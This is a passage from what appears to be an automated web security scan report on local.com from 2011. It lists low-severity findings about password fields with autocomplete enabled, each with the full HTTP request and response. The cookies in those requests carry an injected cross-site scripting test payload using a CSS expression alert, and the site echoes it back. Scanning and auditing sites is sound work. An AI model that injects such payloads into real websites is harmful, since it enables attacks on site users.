session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103070
Date: Thu, 03 Feb 2011 16:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.19. http://www.local.com/coupons/printable/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.20. http://www.local.com/dialogs/register.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/register.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27119
Date: Thu, 03 Feb 2011 16:55:56 GMT
Content-Length: 27119
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>www.local.com-Register</title
...[SNIP]...
<!-- END typeAhead items -->


<form name="aspnetForm" method="post" action="/dialogs/register.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password" type="password" id="defaultPageTemplate_password" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password2" type="password" id="defaultPageTemplate_password2" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$haveActPassword" type="password" id="defaultPageTemplate_haveActPassword" class="haveActInput" />
                       <p class="pTB10">
...[SNIP]...

5.21. http://www.local.com/events/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.22. http://www.local.com/events/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86268
Date: Thu, 03 Feb 2011 16:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.23. http://www.local.com/events/category/music/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.24. http://www.local.com/events/category/performing-arts/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.25. http://www.local.com/events/category/sports/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.26. http://www.local.com/faq.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; 